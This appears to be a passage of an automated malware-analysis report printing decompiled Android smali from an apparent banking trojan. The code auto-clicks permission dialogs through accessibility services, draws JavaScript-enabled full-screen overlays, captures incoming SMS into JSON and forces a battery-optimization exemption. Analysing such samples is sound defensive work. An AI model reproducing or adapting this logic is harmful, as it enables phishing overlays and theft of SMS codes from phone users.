                        35invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        37invoke-virtual {v5, v4}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        39invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        40move-result-object v5
                        42invoke-static {v1, v5}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        43try_end_3e: if-nez v4, :cond_5b
                        44const/4 v4, 0x1
                        45goto/16 :goto_5c
                        46catch_42: move-exception v4
                        47new-instance v5, Ljava/lang/StringBuilder;
                        49invoke-direct {v5}, Ljava/lang/StringBuilder;-><init>()V
                        51const-string v6, "1 Exception: "
                        53invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        55invoke-virtual {v4}, Ljava/lang/Exception;->toString()Ljava/lang/String;
                        56move-result-object v4
                        58invoke-virtual {v5, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        60invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        61move-result-object v4
                        63invoke-static {v1, v4}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        64cond_5b: const/4 v4, 0x0
                        65goto_5c: new-instance v5, Ljava/lang/StringBuilder;
                        67invoke-direct {v5}, Ljava/lang/StringBuilder;-><init>()V
                        69const-string v6, "accessCoarseLocationAllowed: "
                        71invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        73invoke-virtual {v5, v4}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        75invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        76move-result-object v5
                        78invoke-static {v1, v5}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        79if-eqz v4, :cond_73
                        80return-void
                        81cond_73:
                        82const-string v4, "invoke"
                        84invoke-static {v1, v4}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        85const-class v4, Landroid/app/Activity;
                        87const-string v5, "requestPermissions"
                        88const/4 v6, 0x2
                        89new-array v7, v6, [Ljava/lang/Class;
                        90const-class v8, [Ljava/lang/String;
                        91aput-object v8, v7, v3
                        93sget-object v8, Ljava/lang/Integer;->TYPE:Ljava/lang/Class;
                        94aput-object v8, v7, v2
                        96invoke-virtual {v4, v5, v7}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        97move-result-object v4
                        98new-array v5, v6, [Ljava/lang/Object;
                        99filled-new-array {v0}, [Ljava/lang/String;
                        100move-result-object v0
                        101aput-object v0, v5, v3
                        102const v0, 0x12345
                        104invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        105move-result-object v0
                        106aput-object v0, v5, v2
                        108invoke-virtual {v4, p0, v5}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        109try_end_9f: goto/16 :goto_b9
                        110catch_a0: move-exception v0
                        111new-instance v2, Ljava/lang/StringBuilder;
                        113invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        115const-string v3, "2 Exception: "
                        117invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        119invoke-virtual {v0}, Ljava/lang/Exception;->toString()Ljava/lang/String;
                        120move-result-object v0
                        122invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        124invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        125move-result-object v0
                        127invoke-static {v1, v0}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        128cond_b9: return-void
                        Cross References
                        APIs
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.CharSequence.toString
                        • java.lang.String.matches
                        • android.view.accessibility.AccessibilityEvent.getSource
                        • android.view.accessibility.AccessibilityEvent.getText
                        • android.os.Build.MANUFACTURER:Ljava/lang/String
                        • java.lang.String.equalsIgnoreCase
                        • android.view.accessibility.AccessibilityEvent.getSource
                        • android.view.accessibility.AccessibilityNodeInfo.performAction
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.os.Build.MANUFACTURER:Ljava/lang/String
                        • java.lang.String.equalsIgnoreCase
                        • android.view.accessibility.AccessibilityEvent.getText
                        • java.util.List.size
                        • android.view.accessibility.AccessibilityEvent.getSource
                        • android.view.accessibility.AccessibilityNodeInfo.performAction
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.view.accessibility.AccessibilityEvent.getSource
                        • android.view.accessibility.AccessibilityNodeInfo.performAction
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • (com.android.systemui$|android)
                        • huawei
                        • .*:id/button1
                        • [func] [activatePinned] [HUAWEI] click on pinned request:
                        • xiaomi
                        • [func] [activatePinned] [XIAOMI] click on pinned request:
                        • [func] [activatePinned] [NORMAL] click on pinned request:
                        Position Instruction Meta Information
                        0.prologue
                        1const/16 v2, 0x10
                        2sget-boolean v0, Lcom/lib;->isPinned:Z
                        3if-nez v0, :cond_5c
                        5invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        6move-result-object v0
                        7if-eqz v0, :cond_5c
                        9invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        10move-result-object v0
                        12invoke-interface {v0}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        13move-result-object v0
                        15const-string v1, "(com.android.systemui$|android)"
                        17invoke-virtual {v0, v1}, Ljava/lang/String;->matches(Ljava/lang/String;)Z
                        18move-result v0
                        19if-eqz v0, :cond_5c
                        21invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getSource()Landroid/view/accessibility/AccessibilityNodeInfo;
                        22move-result-object v0
                        23if-eqz v0, :cond_5c
                        25invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getText()Ljava/util/List;
                        26move-result-object v0
                        27if-eqz v0, :cond_5c
                        29sget-object v0, Landroid/os/Build;->MANUFACTURER:Ljava/lang/String;
                        31const-string v1, "huawei"
                        33invoke-virtual {v0, v1}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z
                        34move-result v0
                        35if-eqz v0, :cond_5e
                        37invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getSource()Landroid/view/accessibility/AccessibilityNodeInfo;
                        38move-result-object v0
                        40const-string v1, ".*:id/button1"
                        42invoke-virtual {p0, v0, v1}, Lcom/lib;->getElementByID(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        43move-result-object v0
                        44if-eqz v0, :cond_5c
                        46invoke-virtual {v0, v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->performAction(I)Z
                        47move-result v0
                        48sput-boolean v0, Lcom/lib;->isPinned:Z
                        49new-instance v0, Ljava/lang/StringBuilder;
                        51invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        53const-string v1, "[func] [activatePinned] [HUAWEI] click on pinned request: "
                        55invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        56move-result-object v0
                        57sget-boolean v1, Lcom/lib;->isPinned:Z
                        59invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        60move-result-object v0
                        62invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        63move-result-object v0
                        65invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        66goto_5c: const/4 v0, 0x0
                        67return v0
                        68cond_5e:
                        69sget-object v0, Landroid/os/Build;->MANUFACTURER:Ljava/lang/String;
                        71const-string v1, "xiaomi"
                        73invoke-virtual {v0, v1}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z
                        74move-result v0
                        75if-eqz v0, :cond_95
                        77invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getText()Ljava/util/List;
                        78move-result-object v0
                        80invoke-interface {v0}, Ljava/util/List;->size()I
                        81move-result v0
                        82if-lez v0, :cond_5c
                        84invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getSource()Landroid/view/accessibility/AccessibilityNodeInfo;
                        85move-result-object v0
                        87invoke-virtual {v0, v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->performAction(I)Z
                        88move-result v0
                        89sput-boolean v0, Lcom/lib;->isPinned:Z
                        90new-instance v0, Ljava/lang/StringBuilder;
                        92invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        94const-string v1, "[func] [activatePinned] [XIAOMI] click on pinned request: "
                        96invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        97move-result-object v0
                        98sget-boolean v1, Lcom/lib;->isPinned:Z
                        100invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        101move-result-object v0
                        103invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        104move-result-object v0
                        106invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        107goto/16 :goto_5c
                        108cond_95:
                        109invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getSource()Landroid/view/accessibility/AccessibilityNodeInfo;
                        110move-result-object v0
                        112invoke-virtual {v0, v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->performAction(I)Z
                        113move-result v0
                        114sput-boolean v0, Lcom/lib;->isPinned:Z
                        115new-instance v0, Ljava/lang/StringBuilder;
                        117invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        119const-string v1, "[func] [activatePinned] [NORMAL] click on pinned request: "
                        121invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        122move-result-object v0
                        123sget-boolean v1, Lcom/lib;->isPinned:Z
                        125invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        126move-result-object v0
                        128invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        129move-result-object v0
                        131invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        132goto/16 :goto_5c
                        APIs
                        • android.view.WindowManager$LayoutParams.<init>
                        • android.content.Context.getSystemService
                        • android.webkit.WebView.clearCache
                        • android.webkit.WebView.clearHistory
                        • android.webkit.WebView.getSettings
                        • android.webkit.WebSettings.setJavaScriptEnabled
                        • android.webkit.WebView.getSettings
                        • android.webkit.WebSettings.setJavaScriptCanOpenWindowsAutomatically
                        • java.lang.Integer.intValue
                        • android.view.WindowManager$LayoutParams.<init>
                        • android.webkit.WebView.setLayoutParams
                        • android.view.WindowManager.addView
                        • android.webkit.WebView.setBackgroundColor
                        • android.app.WallpaperManager.getInstance
                        • android.app.WallpaperManager.getDrawable
                        • android.webkit.WebView.setBackground
                        • android.webkit.WebView.loadData
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.webkit.WebView.setBackgroundColor
                        • android.webkit.WebView.loadUrl
                        Strings
                        • window
                        • text/html
                        • [func] [events] [createOverlayOld] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v9, 0x0
                        2const/4 v8, 0x1
                        3if-nez p2, :cond_5
                        4goto_4: return v9
                        5cond_5: sget v1, Landroid/os/Build$VERSION;->SDK_INT:I
                        6const/16 v2, 0x17
                        7if-lt v1, v2, :cond_59
                        8const/16 v1, 0x7f0
                        9goto_d: const v2, 0xc000380
                        10try_start_10: new-instance v10, Landroid/view/WindowManager$LayoutParams;
                        11const/4 v3, -0x3
                        13invoke-direct {v10, v1, v2, v3}, Landroid/view/WindowManager$LayoutParams;-><init>(III)V
                        14const/16 v1, 0x35
                        15iput v1, v10, Landroid/view/WindowManager$LayoutParams;->gravity:I
                        17const-string v1, "window"
                        19invoke-virtual {p1, v1}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        20move-result-object v1
                        21move-object v0, v1
                        22check-cast v0, Landroid/view/WindowManager;
                        23move-object v7, v0
                        24if-eqz v7, :cond_89
                        25const/4 v1, 0x1
                        27invoke-virtual {p2, v1}, Landroid/webkit/WebView;->clearCache(Z)V
                        29invoke-virtual {p2}, Landroid/webkit/WebView;->clearHistory()V
                        31invoke-virtual {p2}, Landroid/webkit/WebView;->getSettings()Landroid/webkit/WebSettings;
                        32move-result-object v1
                        33const/4 v2, 0x1
                        35invoke-virtual {v1, v2}, Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V
                        37invoke-virtual {p2}, Landroid/webkit/WebView;->getSettings()Landroid/webkit/WebSettings;
                        38move-result-object v1
                        39const/4 v2, 0x1
                        41invoke-virtual {v1, v2}, Landroid/webkit/WebSettings;->setJavaScriptCanOpenWindowsAutomatically(Z)V
                        43invoke-virtual {p4}, Ljava/lang/Integer;->intValue()I
                        44move-result v1
                        45packed-switch v1, :pswitch_data_94
                        46goto_44: new-instance v1, Landroid/view/WindowManager$LayoutParams;
                        47const/4 v2, -0x1
                        48const/4 v3, -0x1
                        49const/16 v4, 0x7f6
                        50const/16 v5, 0x10
                        51const/4 v6, -0x3
                        53invoke-direct/range {v1 .. v6}, Landroid/view/WindowManager$LayoutParams;-><init>(IIIII)V
                        55invoke-virtual {p2, v1}, Landroid/webkit/WebView;->setLayoutParams(Landroid/view/ViewGroup$LayoutParams;)V
                        57invoke-interface {v7, p2, v10}, Landroid/view/WindowManager;->addView(Landroid/view/View;Landroid/view/ViewGroup$LayoutParams;)V
                        58move v1, v8
                        59goto_57: move v9, v1
                        60goto/16 :goto_4
                        61cond_59: const/16 v1, 0x7d2
                        62goto/16 :goto_d
                        63pswitch_5c: const/4 v1, 0x0
                        65invoke-virtual {p2, v1}, Landroid/webkit/WebView;->setBackgroundColor(I)V
                        67invoke-static {p1}, Landroid/app/WallpaperManager;->getInstance(Landroid/content/Context;)Landroid/app/WallpaperManager;
                        68move-result-object v1
                        70invoke-virtual {v1}, Landroid/app/WallpaperManager;->getDrawable()Landroid/graphics/drawable/Drawable;
                        71move-result-object v1
                        73invoke-virtual {p2, v1}, Landroid/webkit/WebView;->setBackground(Landroid/graphics/drawable/Drawable;)V
                        75const-string v1, "text/html"
                        76const/4 v2, 0x0
                        78invoke-virtual {p2, p3, v1, v2}, Landroid/webkit/WebView;->loadData(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V
                        79try_end_71: goto/16 :goto_44
                        80catch_72: move-exception v1
                        81new-instance v2, Ljava/lang/StringBuilder;
                        83invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        85const-string v3, "[func] [events] [createOverlayOld] T: "
                        87invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        88move-result-object v2
                        90invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        91move-result-object v1
                        93invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        94move-result-object v1
                        96invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        97cond_89: move v1, v9
                        98goto/16 :goto_57
                        99pswitch_8b: const/4 v1, -0x1
                        100try_start_8c:
                        101invoke-virtual {p2, v1}, Landroid/webkit/WebView;->setBackgroundColor(I)V
                        103invoke-virtual {p2, p3}, Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V
                        104try_end_92: goto/16 :goto_44
                        105nop
                        Cross References
                        APIs
                        • android.view.WindowManager$LayoutParams.<init>
                        • android.content.Context.getSystemService
                        • android.webkit.WebView.<init>
                        • android.webkit.WebView.getSettings
                        • android.webkit.WebSettings.setJavaScriptEnabled
                        • android.webkit.WebView.getSettings
                        • android.webkit.WebSettings.setJavaScriptCanOpenWindowsAutomatically
                        • android.webkit.WebView.setBackgroundColor
                        • android.app.WallpaperManager.getInstance
                        • android.app.WallpaperManager.getDrawable
                        • android.webkit.WebView.setBackground
                        • android.content.Context.getResources
                        • java.lang.Integer.intValue
                        • android.content.res.Resources.getString
                        • android.webkit.WebView.loadData
                        • android.view.WindowManager$LayoutParams.<init>
                        • android.webkit.WebView.setLayoutParams
                        • android.view.WindowManager.addView
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • window
                        • text/html
                        • [func] [events] [createOverlayOld] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v8, 0x1
                        2const/4 v9, 0x0
                        4sget-object v1, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        5if-eqz v1, :cond_7
                        6goto_6: return v9
                        7cond_7: sget v1, Landroid/os/Build$VERSION;->SDK_INT:I
                        8const/16 v2, 0x1a
                        9if-lt v1, v2, :cond_8e
                        10const/16 v1, 0x7f0
                        11goto_f: const v2, 0xc000388
                        12try_start_12: new-instance v10, Landroid/view/WindowManager$LayoutParams;
                        13const/4 v3, -0x3
                        15invoke-direct {v10, v1, v2, v3}, Landroid/view/WindowManager$LayoutParams;-><init>(III)V
                        16const/16 v1, 0x35
                        17iput v1, v10, Landroid/view/WindowManager$LayoutParams;->gravity:I
                        19sget-object v1, Lcom/lib;->a11yContext:Landroid/content/Context;
                        21const-string v2, "window"
                        23invoke-virtual {v1, v2}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        24move-result-object v1
                        25move-object v0, v1
                        26check-cast v0, Landroid/view/WindowManager;
                        27move-object v7, v0
                        28if-eqz v7, :cond_a9
                        29new-instance v1, Landroid/webkit/WebView;
                        31sget-object v2, Lcom/lib;->a11yContext:Landroid/content/Context;
                        33invoke-direct {v1, v2}, Landroid/webkit/WebView;-><init>(Landroid/content/Context;)V
                        34sput-object v1, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        36sget-object v1, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        38invoke-virtual {v1}, Landroid/webkit/WebView;->getSettings()Landroid/webkit/WebSettings;
                        39move-result-object v1
                        40const/4 v2, 0x1
                        42invoke-virtual {v1, v2}, Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V
                        44sget-object v1, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        46invoke-virtual {v1}, Landroid/webkit/WebView;->getSettings()Landroid/webkit/WebSettings;
                        47move-result-object v1
                        48const/4 v2, 0x1
                        50invoke-virtual {v1, v2}, Landroid/webkit/WebSettings;->setJavaScriptCanOpenWindowsAutomatically(Z)V
                        52sget-object v1, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        53const/4 v2, 0x0
                        55invoke-virtual {v1, v2}, Landroid/webkit/WebView;->setBackgroundColor(I)V
                        57sget-object v1, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        59sget-object v2, Lcom/lib;->a11yContext:Landroid/content/Context;
                        61invoke-static {v2}, Landroid/app/WallpaperManager;->getInstance(Landroid/content/Context;)Landroid/app/WallpaperManager;
                        62move-result-object v2
                        64invoke-virtual {v2}, Landroid/app/WallpaperManager;->getDrawable()Landroid/graphics/drawable/Drawable;
                        65move-result-object v2
                        67invoke-virtual {v1, v2}, Landroid/webkit/WebView;->setBackground(Landroid/graphics/drawable/Drawable;)V
                        69sget-object v1, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        71sget-object v2, Lcom/lib;->a11yContext:Landroid/content/Context;
                        73invoke-virtual {v2}, Landroid/content/Context;->getResources()Landroid/content/res/Resources;
                        74move-result-object v2
                        76sget-object v3, Lcom/lib;->banner_text:Ljava/lang/Integer;
                        78invoke-virtual {v3}, Ljava/lang/Integer;->intValue()I
                        79move-result v3
                        81invoke-virtual {v2, v3}, Landroid/content/res/Resources;->getString(I)Ljava/lang/String;
                        82move-result-object v2
                        84const-string v3, "text/html"
                        85const/4 v4, 0x0
                        87invoke-virtual {v1, v2, v3, v4}, Landroid/webkit/WebView;->loadData(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V
                        89sget-object v11, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        90new-instance v1, Landroid/view/WindowManager$LayoutParams;
                        91const/4 v2, -0x1
                        92const/4 v3, -0x1
                        93const/16 v4, 0x7f6
                        94const/16 v5, 0x10
                        95const/4 v6, -0x3
                        97invoke-direct/range {v1 .. v6}, Landroid/view/WindowManager$LayoutParams;-><init>(IIIII)V
                        99invoke-virtual {v11, v1}, Landroid/webkit/WebView;->setLayoutParams(Landroid/view/ViewGroup$LayoutParams;)V
                        101sget-object v1, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        103invoke-interface {v7, v1, v10}, Landroid/view/WindowManager;->addView(Landroid/view/View;Landroid/view/ViewGroup$LayoutParams;)V
                        104try_end_8a: move v1, v8
                        105goto_8b: move v9, v1
                        106goto/16 :goto_6
                        107cond_8e: const/16 v1, 0x7d6
                        108goto/16 :goto_f
                        109catch_92: move-exception v1
                        110new-instance v2, Ljava/lang/StringBuilder;
                        112invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        114const-string v3, "[func] [events] [createOverlayOld] T: "
                        116invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        117move-result-object v2
                        119invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        120move-result-object v1
                        122invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        123move-result-object v1
                        125invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        126cond_a9: move v1, v9
                        127goto/16 :goto_8b
                        Cross References
                        APIs
                        • org.json.JSONObject.<init>
                        • android.provider.Telephony$Sms$Intents.getMessagesFromIntent
                        • android.telephony.SmsMessage.getDisplayOriginatingAddress
                        • org.json.JSONObject.put
                        • android.telephony.SmsMessage.getMessageBody
                        • org.json.JSONObject.put
                        • android.content.Intent.getExtras
                        • android.os.Bundle.get
                        • android.telephony.SmsMessage.getOriginatingAddress
                        • org.json.JSONObject.put
                        • java.lang.String.<init>
                        • android.telephony.SmsMessage.createFromPdu
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • android.telephony.SmsMessage.getMessageBody
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.put
                        • java.lang.System.currentTimeMillis
                        • org.json.JSONObject.put
                        Strings
                        • from
                        • text
                        • pdus
                        • time
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x0
                        2new-instance v2, Lorg/json/JSONObject;
                        4invoke-direct {v2}, Lorg/json/JSONObject;-><init>()V
                        5try_start_6: sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
                        6const/16 v3, 0x13
                        7if-lt v0, v3, :cond_2a
                        9invoke-static {p2}, Landroid/provider/Telephony$Sms$Intents;->getMessagesFromIntent(Landroid/content/Intent;)[Landroid/telephony/SmsMessage;
                        10move-result-object v0
                        11array-length v3, v0
                        12goto_11: if-ge v1, v3, :cond_82
                        13aget-object v4, v0, v1
                        15const-string v5, "from"
                        17invoke-virtual {v4}, Landroid/telephony/SmsMessage;->getDisplayOriginatingAddress()Ljava/lang/String;
                        18move-result-object v6
                        20invoke-virtual {v2, v5, v6}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        22const-string v5, "text"
                        24invoke-virtual {v4}, Landroid/telephony/SmsMessage;->getMessageBody()Ljava/lang/String;
                        25move-result-object v4
                        27invoke-virtual {v2, v5, v4}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        28add-int/lit8 v1, v1, 0x1
                        29goto/16 :goto_11
                        30cond_2a:
                        31invoke-virtual {p2}, Landroid/content/Intent;->getExtras()Landroid/os/Bundle;
                        32move-result-object v0
                        33if-eqz v0, :cond_82
                        35const-string v3, "pdus"
                        37invoke-virtual {v0, v3}, Landroid/os/Bundle;->get(Ljava/lang/String;)Ljava/lang/Object;
                        38move-result-object v0
                        39check-cast v0, [Ljava/lang/Object;
                        40check-cast v0, [Ljava/lang/Object;
                        41if-nez v0, :cond_3e
                        42move-object v0, v2
                        43goto_3d: return-object v0
                        44cond_3e: array-length v3, v0
                        45new-array v5, v3, [Landroid/telephony/SmsMessage;
                        47const-string v3, "from"
                        48const/4 v4, 0x0
                        49aget-object v4, v5, v4
                        51invoke-virtual {v4}, Landroid/telephony/SmsMessage;->getOriginatingAddress()Ljava/lang/String;
                        52move-result-object v4
                        54invoke-virtual {v2, v3, v4}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        55new-instance v4, Ljava/lang/String;
                        57invoke-direct {v4}, Ljava/lang/String;-><init>()V
                        58move v3, v1
                        59goto_53: array-length v1, v5
                        60if-ge v3, v1, :cond_7d
                        61aget-object v1, v0, v3
                        62check-cast v1, [B
                        63check-cast v1, [B
                        65invoke-static {v1}, Landroid/telephony/SmsMessage;->createFromPdu([B)Landroid/telephony/SmsMessage;
                        66move-result-object v1
                        67aput-object v1, v5, v3
                        68new-instance v1, Ljava/lang/StringBuilder;
                        70invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        72invoke-virtual {v1, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        73move-result-object v1
                        74aget-object v4, v5, v3
                        76invoke-virtual {v4}, Landroid/telephony/SmsMessage;->getMessageBody()Ljava/lang/String;
                        77move-result-object v4
                        79invoke-virtual {v1, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        80move-result-object v1
                        82invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        83move-result-object v4
                        84add-int/lit8 v1, v3, 0x1
                        85move v3, v1
                        86goto/16 :goto_53
                        87cond_7d:
                        88const-string v0, "text"
                        90invoke-virtual {v2, v0, v4}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        91cond_82:
                        92const-string v0, "time"
                        94invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
                        95move-result-wide v4
                        96const-wide/16 v6, 0x3e8
                        97div-long/2addr v4, v6
                        99invoke-virtual {v2, v0, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;J)Lorg/json/JSONObject;
                        100goto_8e: move-object v0, v2
                        101goto/16 :goto_3d
                        102catch_90: move-exception v0
                        103goto/16 :goto_8e
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.content.Intent.<init>
                        • android.content.Intent.setAction
                        • android.content.Intent.setFlags
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • android.content.Context.getPackageName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.net.Uri.parse
                        • android.content.Intent.setData
                        • android.content.Context.startActivity
                        • java.lang.Long.valueOf
                        Strings
                        • { \"com.android.settings\": {\"inject\": [ { \"id\": \".*:id/button1\", \"action\": \"CLICK\", \"options\" : { \"type\" : \"TYPE_WINDOW_STATE_CHANGED\"}, \"exist\" : { \"byText\" : \"(?sim)(.*background.*
                        • .*|.*
                        • .*background.*)\" }, \"isNext\" : true }], \"once\" : true, \"debug\" : false } }
                        • android.settings.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
                        Position Instruction Meta Information
                        0.prologue
                        1sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
                        2const/16 v1, 0x17
                        3if-lt v0, v1, :cond_6d
                        4new-instance v0, Ljava/lang/StringBuilder;
                        6invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        8const-string v1, "{ \"com.android.settings\": {\"inject\": [ { \"id\": \".*:id/button1\", \"action\": \"CLICK\", \"options\" : { \"type\" : \"TYPE_WINDOW_STATE_CHANGED\"}, \"exist\" : { \"byText\" : \"(?sim)(.*background.*"
                        10invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        11move-result-object v0
                        13sget-object v1, Lcom/lib;->selfAppName:Ljava/lang/String;
                        15invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        16move-result-object v0
                        18const-string v1, ".*|.*"
